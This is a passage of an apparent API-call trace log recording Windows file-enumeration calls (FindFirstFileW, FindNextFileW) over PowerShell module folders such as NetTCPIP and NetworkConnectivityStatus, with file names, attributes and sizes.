hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetIPAddress.cdxml", cAlternateFileName="")) returned 1 [0265.207] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6029, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetIPInterface.cdxml", cAlternateFileName="")) returned 1 [0265.207] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetIPv4Protocol.cdxml", cAlternateFileName="")) returned 1 [0265.207] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb92823, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfb92823, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfb92823, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x37ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetIPv6Protocol.cdxml", cAlternateFileName="")) returned 1 [0265.208] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x29e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNeighbor.cdxml", cAlternateFileName="")) returned 1 [0265.208] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb92823, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfb92823, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfb92823, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x149b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetOffloadGlobalSetting.cdxml", cAlternateFileName="")) returned 1 [0265.209] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x55d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetPrefixPolicy.cdxml", cAlternateFileName="")) returned 1 [0265.234] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x403b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetRoute.cdxml", cAlternateFileName="")) returned 1 [0265.234] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x11ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetTCPConnection.cdxml", cAlternateFileName="")) returned 1 [0265.235] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbdece0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbdece0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbdece0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3eb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetTCPSetting.cdxml", cAlternateFileName="")) returned 1 [0265.235] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb92823, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfb92823, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfb92823, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetTransportFilter.cdxml", cAlternateFileName="")) returned 1 [0265.236] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetUDPEndpoint.cdxml", cAlternateFileName="")) returned 1 [0265.236] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetUDPSetting.cdxml", cAlternateFileName="")) returned 1 [0265.237] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb92823, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfb92823, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x393a, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPConfiguration.psm1", cAlternateFileName="")) returned 1 [0265.237] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x862, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP.psd1", cAlternateFileName="")) returned 1 [0265.238] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x11582, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tcpip.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.238] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb6a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tcpip.Types.ps1xml", cAlternateFileName="")) returned 1 [0265.239] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3fcf, dwReserved0=0x0, dwReserved1=0x0, cFileName="Test-NetConnection.psm1", cAlternateFileName="")) returned 1 [0265.239] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3fcf, dwReserved0=0x0, dwReserved1=0x0, cFileName="Test-NetConnection.psm1", cAlternateFileName="")) returned 0 [0265.240] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkConnectivityStatus\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.241] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.241] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa877b6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa877b6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa877b6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x933, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAConnectionStatus.cdxml", cAlternateFileName="")) returned 1 [0265.242] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x340, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAConnectionStatus.format.ps1xml", cAlternateFileName="")) returned 1 [0265.243] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa877b6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa877b6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x419, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAConnectionStatus.types.ps1xml", cAlternateFileName="")) returned 1 [0265.243] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NCSIPolicyConfiguration.cdxml", cAlternateFileName="")) returned 1 [0265.244] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfad3c67, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfad3c67, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfad3c67, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x542, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NCSIPolicyConfiguration.format.ps1xml", cAlternateFileName="")) returned 1 [0265.244] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus.psd1", cAlternateFileName="")) returned 1 [0265.245] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus.psd1", cAlternateFileName="")) returned 0 [0265.263] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkConnectivityStatus\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.264] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.264] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa877b6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa877b6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa877b6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x933, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAConnectionStatus.cdxml", cAlternateFileName="")) returned 1 [0265.265] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x340, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAConnectionStatus.format.ps1xml", cAlternateFileName="")) returned 1 [0265.265] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa877b6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa877b6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x419, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAConnectionStatus.types.ps1xml", cAlternateFileName="")) returned 1 [0265.265] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NCSIPolicyConfiguration.cdxml", cAlternateFileName="")) returned 1 [0265.266] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfad3c67, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfad3c67, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfad3c67, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x542, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NCSIPolicyConfiguration.format.ps1xml", cAlternateFileName="")) returned 1 [0265.266] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus.psd1", cAlternateFileName="")) returned 1 [0265.267] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0265.267] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkConnectivityStatus", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkConnectivityStatus", lpFilePart=0x0) returned 0x4c [0265.268] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkConnectivityStatus\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dafc0 [0265.268] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.269] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa877b6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa877b6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa877b6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x933, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAConnectionStatus.cdxml", cAlternateFileName="")) returned 1 [0265.269] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x340, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAConnectionStatus.format.ps1xml", cAlternateFileName="")) returned 1 [0265.270] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa877b6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa877b6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x419, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAConnectionStatus.types.ps1xml", cAlternateFileName="")) returned 1 [0265.270] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NCSIPolicyConfiguration.cdxml", cAlternateFileName="")) returned 1 [0265.271] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfad3c67, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfad3c67, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfad3c67, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x542, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NCSIPolicyConfiguration.format.ps1xml", cAlternateFileName="")) returned 1 [0265.271] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2f6, 